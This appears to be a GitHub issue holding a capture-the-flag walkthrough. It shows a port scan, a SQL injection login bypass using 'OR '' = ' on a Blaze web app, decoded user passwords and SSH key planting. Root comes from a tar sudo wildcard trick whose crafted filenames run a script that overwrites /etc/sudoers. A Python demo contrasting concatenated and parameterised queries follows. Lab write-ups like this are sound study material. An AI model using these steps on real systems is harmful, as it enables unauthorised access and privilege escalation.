WDavid404 opened 4 months ago
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
9090/tcp open ssl/zeus-admin? syn-ack ttl 61
80/tcp --> Blaze --> search exploit info:
Blaze Apps 1.x - SQL Injection / HTML Injection (https://www.exploit-db.com/exploits/33995)
http://192.168.192.10/login.php --> input a' as username or b' as password --> SQL injection "Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1"
Based on
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt
Try 'OR '' = '
--> we login successfully
Base64 decode passwords --> james:canttouchhhthiss@455152 cameron:thisscanttbetouchedd@455152
Try ssh login --> all failed: Permission denied (publickey)
Access 9090/tcp Login with james --> succeed.
Add authorized_key for james ssh login with public key
sudo -l -->
According to https://gtfobins.github.io/gtfobins/tar/#sudo go to /tmp
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
echo "echo 'james ALL=(root) NOPASSWD: ALL' > /etc/sudoers" > shell.sh
(PS: echo "chmod +s > /bin/bash" > shell.sh didn't work...)
Keypoints:
'OR '' = '
(https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Databases/MySQL-SQLi-Login-Bypass.fuzzdb.txt)
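The login bypass the writeup relies on works only because the form's input is concatenated into the SQL text. The following is an added example (not the issue author's code and not the Blaze application's) that models the two behaviours seen above against an in-memory SQLite table with constructed usernames: the stray single quote that produced the "SQL syntax" error, and the `'OR '' = '` string that logged in. Beside the vulnerable version is the parameterised one a fix would use, where the same inputs are bound as data and neither the error nor the bypass occurs. The table name, column names and sample rows are assumptions for the demonstration; the lab ran MySQL, so the exact error text differs.

```python
import sqlite3

# Constructed sample credential table for this example only (not the lab's data).
SAMPLE_USERS = [("james", "hash-of-james-pw"), ("cameron", "hash-of-cameron-pw")]

# The probe and the bypass string from the writeup.
PROBE_USER, PROBE_PASS = "a'", "b'"
BYPASS = "'OR '' = '"


def make_db():
    """Create an in-memory users table with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated query: user input becomes part of the SQL grammar."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_hardened(conn, username, password):
    """Parameterised query: user input is bound as a value, never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run both implementations against the probe and the bypass string."""
    conn = make_db()
    results = {}

    # The quote probe: the vulnerable query breaks and the database error leaks.
    try:
        login_vulnerable(conn, PROBE_USER, PROBE_PASS)
        results["vuln_probe"] = "no error"
    except sqlite3.OperationalError as exc:
        results["vuln_probe"] = "syntax error: " + str(exc)
    # The hardened query treats the quote as a character in a username: no match, no error.
    results["hard_probe"] = login_hardened(conn, PROBE_USER, PROBE_PASS)

    # The bypass string in both fields turns the WHERE clause into
    #   username='' OR ('' = '' AND password='') OR '' = ''
    # whose last term is always true, so the first row is returned.
    results["vuln_bypass"] = login_vulnerable(conn, BYPASS, BYPASS)
    # Bound as data, the string is just an unknown username.
    results["hard_bypass"] = login_hardened(conn, BYPASS, BYPASS)
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The leaked error on the probe is the signal the writeup used to confirm injection; a fixed application returns a generic login failure for both inputs, and the parameterised query is the change that makes it do so.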